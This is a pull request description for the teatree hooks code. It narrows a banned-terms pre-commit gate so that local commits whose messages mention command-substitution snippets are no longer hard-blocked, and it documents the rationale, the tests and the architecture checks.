Fixes #1415 (task #62): a normal `git commit -m` whose message merely *mentions* a command-substitution snippet (e.g. a `$(date)`/`$(cat)` construct described in the prose) was hard-blocked by the banned-terms posting gate on any repo whose visibility the in-hook probe could not classify — the common steady state for an undeclared local checkout. The documented workaround was `ALLOW_BANNED_TERM=1` on every ordinary commit, which is unacceptable as a steady state.

## Why

`resolve_inline_body_value` fail-closes on any *live* command-substitution in a body value (correct for a public `gh`/`glab --body` whose expansion the gate genuinely cannot predict). The resulting fail-closed marker only downgraded for a *provably-private* landing repo, so the **unknown-visibility** bucket fell through to a hard `deny`.

But a `git commit` is **local**, not a publish to a public surface, and the dedicated pre-push gate `refuse-public-push-with-leak.sh` re-scans commit messages against the privacy scanner before they reach a public remote. So for the two unreadable-body markers the gate now downgrades a `git commit` whose landing repo is **not provably-public** (private, allowlisted, OR unknown). The following all stay hard-blocked:

- a probe-confirmed **PUBLIC**-repo commit with an unreadable body (conservative defence in depth);
- every `gh`/`glab` post with an unreadable body (the real public action, no push gate behind it);
- a commit chained to a public `gh`/`glab` post in the same command (per-segment publish-inert proof unchanged);
- a **real scannable** banned term in an unknown/public commit (untouched path);
- the **scanner-unavailable** marker on every surface (#1954).

## How

- `commit_targets_non_public_commit` / `commit_branch_not_provably_public` (new, in `_commit_carve_out.py`) reuse the existing chained-segment publish-inert proof; the landing-repo eligibility widens from PRIVATE-only to NOT-provably-public via a new `_repo_root_is_provably_public` (the strict probe-confirmed-PUBLIC-only complement of `commit_targets_private_repo`).
- `_banned_term_marker_blocks` consults the new predicate for the two unreadable-body markers.
- The marker-decision logic moved out of the LOC-capped `hook_router` god-module into a bare sibling `banned_terms_marker.py`, so the router nets smaller (module-health clean).

## Test evidence

- RED→GREEN: `TestNormalCommitWithDollarParenMessage` reproduces the false-block (observed RED on the pre-fix code), plus unknown-visibility unreadable-body downgrade cases in `test_banned_terms_scanner.py` / `test_banned_terms_hook.py`.
- Anti-vacuity: with the new wiring disabled, all three downgrade tests revert to a hard `deny` (verified). The prior unknown-visibility must-block tests were converted to assert the downgrade and the provably-PUBLIC must-block was re-pinned on a `probe_visibility == "PUBLIC"` verdict — no must-block of a genuinely public surface was inverted.
- Suites green: `tests/teatree_hooks/` (1518), `tests/teatree_quality/` (66), leak/gate-failures (141), danger-gate/eval-replay (1135). `ruff check`, `ruff format --check`, `ty check`, `tach check`, and `check_module_health.py --from-ref origin/main` all clean.

## Architecture pre-check — #1415 task #62

**1. BLUEPRINT § alignment** — touches the PreToolUse pre-publish gate chain (hook gates; `hooks/CLAUDE.md` § "The banned-terms carve-out prefers the offline allowlist over the live probe"). No BLUEPRINT invariant numbering change.

**2. FSM phase boundaries** — n/a, no `Ticket.State`/`Worktree.State` transition.

**3. Extension-point contracts** — no `OverlayBase`/scanner/`*Backend` Protocol change. New `command_targets_non_public_commit` is re-exported from `publish_surface` alongside the existing `command_targets_private_only` for the single hook-router consumer.

**4. Component boundaries** — detection logic stays in `src/teatree/hooks/` (`_commit_carve_out.py`, `publish_surface.py` re-export); the router-coupled decision moved to a `hooks/scripts/` sibling (`banned_terms_marker.py`), matching the established `unknown_repo_push_gate` / `django_bootstrap` sibling pattern. The router keeps only the thin `emit_pretooluse_deny` emission.

**5. Dependency direction** — `tach check` green. `_commit_carve_out` ↔ `publish_surface` use the existing lazy-import-at-call-time pattern (no new cycle); `banned_terms_marker.py` (hooks/scripts) lazily imports the teatree predicates at call time.

**6. Test surface** — each behaviour has a named test asserting the gate decision (`handle_banned_terms_pretool` blocked vs warn) for the downgrade, the provably-public block, the gh/glab post block, the chained-public-post block, and the real-term block.

**7. Resilience invariants** — the gate is a read-only PreToolUse decision (no external write). Fail-direction is conservative: unknown-visibility *commits* downgrade (the push gate is the verify-by-re-read backstop on the public surface), while every genuinely-public surface and the scanner-unavailable marker stay hard-blocked. Idempotent (pure function of command + cwd).

**8. Identity & key normalization** — repo identity resolved via the existing host-qualification-symmetric `slug_for_cwd` / `slug_is_allowlisted_private` / `probe_visibility` chain; no qualifier stripping introduced.

**9. Behavior preservation / capability deletion** — this widens a downgrade (relaxes an over-block), so it narrows the gate's coverage for the **unreadable-body unknown-visibility commit** case only. Justification: the protection is **preserved** by `refuse-public-push-with-leak.sh`, which scans commit messages at push to a public remote (the real chokepoint, with reliable visibility resolution). No genuinely-public must-block was inverted: the prior unknown-visibility must-block tests targeted repos whose *probe returned unknown*, not PUBLIC; they were converted to the corrected downgrade, and a provably-PUBLIC (probe `"PUBLIC"`) must-block was added/re-pinned in their place. Real scannable banned terms, gh/glab public posts, and the scanner-unavailable marker are untouched.
